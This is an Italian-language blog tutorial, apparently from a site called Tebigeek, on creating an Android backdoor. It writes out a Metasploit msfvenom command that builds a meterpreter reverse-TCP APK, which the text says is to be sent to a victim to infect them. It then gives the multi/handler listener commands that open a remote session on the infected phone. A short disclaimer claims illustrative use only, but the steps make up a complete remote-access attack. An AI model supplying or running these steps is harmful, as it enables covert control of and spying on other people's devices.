Come creare una BackDoor
per Android con Linux
Oggi andremo a vedere come creare una BackDoor per Android con Linux in pochi e semplici passi.
Molte persone per controllare un dispositivo Android da remoto usa il noto Tool “AndroRat”. Ma siccome a noi di Tebigeek non piace la la “Pappa pronta” andremo a vedere come crearci il nostro RAT con qualsiasi distribuzione Linux!
Questa guida ricordiamo che è solo a scopo illustrativo per testare i vostri dispositivi e non per infettare altri. Tebigeek non si assume nessuna responsabilità dell’uso che ne farete.
Requisiti:
– Una distribuzione Linux (BackBox, Kali, Parrot ecc…)
– Framework Metasploit (Già presente nelle distribuzioni Linux dedicate ai Pen Test, come Kali Linux)
– Un dispositivo Android
In questa guida userò BackBox.
Step 1: Creare il Payload!
Apriamo il terminale su BackBox
Utilizziamo Metasploit per creare l’exploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1604 R >
/home/the_boss_/Scrivania/Hack.apk
Una volta eseguito il comando avremo un file Hack.apk da inviare alla vittima per infettarla.
Step 2: Impostazioni Connessione
Adesso bisogna predisporre la nostra macchina ad una connessione di tipo reverse_tcp con questi comandi:
msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp
A questo punto inseriamo i parametri associati al nostro scenario, con questi comandi in fila:
set lhost 192.168.1.6 –> Indirizzo IP dell'attaccante set lport 1604 –> porta su cui ascoltare per connessione in entrata (assicurarsi che la porta sia aperta) exploit –> Avviamo l'ascolto in attesa di connessioni in entrata
Quando installeremo l’APK sul dispositivo nel terminale vedremo la connessione in ascolto.
Arrivati a questo punto siete riusciti ad infettare la vostra vittima, vi consiglio di provare solo in locale su dispositivi di vostra proprietà per evitare eventuali problemi, anche perchè io e Tebigeek non ci assumiamo nessuna responsabilità come vi ho già detto all’inizio.